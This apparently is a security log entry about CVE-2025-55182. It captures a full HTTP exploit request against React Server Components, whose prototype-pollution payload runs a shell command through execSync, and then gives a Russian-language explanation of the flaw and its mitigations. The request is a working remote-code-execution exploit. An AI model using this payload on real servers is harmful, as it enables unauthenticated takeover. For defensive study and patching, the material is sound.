CVE-2025-55182

2026-03-31

31.148.99.42

ukraine 

Meta 

React 

POST / HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Host: ███████████
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 705
X-Forwarded-For: ████████████
Accept-Encoding: gzip, deflate
Accept: */*
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Connection: close

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

CVE-2025-55182 затрагивает пакеты react-server-dom-webpack, react-server-dom-parcel и react-server-dom-turbopack версий 19.0.0, 19.1.0, 19.1.1 и 19.2.0. :contentReference
Причина — небезопасная десериализация данных, полученных через протокол “Flight” у React Server Components: сервер принимает HTTP-запрос с payload, неправильно проверяет содержимое и приводит его к JS-структурам, что даёт возможность вставить вредоносные объекты (включая proto и др.). Это может привести к “prototype pollution” и/или выполнению произвольного JS-/OS-кода на сервере. 
Для эксплуатации не требуется аутентификация, сложность атаки низкая — достаточно одного HTTP-запроса.
Учитывая широкое распространение React и фреймворков/сборщиков, использующих RSC (например Next.js, React Router, Waku, Parcel- и Vite-RSC, rwsdk и др.), большое число приложений и сервисов могут быть под угрозой.
Уязвимость была публично раскрыта 3 декабря 2025 года, и вскоре после этого были выпущены патчи.

Обновить пакеты React Server Components: немедленно обновите vuln-пакеты до безопасных версий (react-server-dom-webpack/par­cel/turbopack → 19.0.1, 19.1.2 или 19.2.1).
Проверить зависимости: Проверьте, используются ли во фреймворках или сборщиках RSC (например Next.js, React Router, Waku, @parcel/rsc, @vitejs/plugin-rsc, rwsdk), и обновите их до патчей. 
Отключить или ограничить RSC-эндпоинты: При возможности временно отключите серверные функции React или закройте к ним доступ через firewall / WAF / сетевые правила.
Защита на уровне runtime: Используйте WAF, систему обнаружения вторжений, мониторинг поведения и другие средства защиты, чтобы блокировать подозрительные запросы и пост-эксплуатационные действия.
Проверка и валидация входящих данных: Пересмотрите логику десериализации, избегайте автоматически десериализовать непроверенные объекты, особенно если приложение принимает JSON/payload от пользователя. Возможно, потребуется дополнительная валидация.